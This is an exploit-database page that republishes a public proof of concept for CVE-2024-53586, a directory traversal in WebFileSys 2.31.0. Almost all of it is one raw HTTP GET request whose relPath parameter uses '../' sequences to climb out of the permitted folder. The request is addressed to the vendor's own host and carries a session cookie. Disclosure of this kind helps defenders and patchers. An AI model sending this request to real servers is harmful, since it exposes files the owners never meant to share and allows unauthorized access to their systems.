Exploit for WebFileSys 2.31.0 Directory Traversal CVE-2024-53586

Name: Exploit for WebFileSys 2.31.0 Directory Traversal CVE-2024-53586
Rating: 5 (149 reviews)

2025-02-06 | CVSS 7.3

## https://sploitus.com/exploit?id=PACKETSTORM:189017
# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
    # Date: Nov 25, 2024
    # Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee 
    # Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
    # Software Link: http://www.webfilesys.de/webfilesys-home/download.html
    # Version: 2.31.0
    # Tested on: macOS
    # CVE : CVE-2024-53586
    
    GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
    Host: www.webfilesys.de
    Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Priority: u=0, i
    Te: trailers
    Connection: keep-alive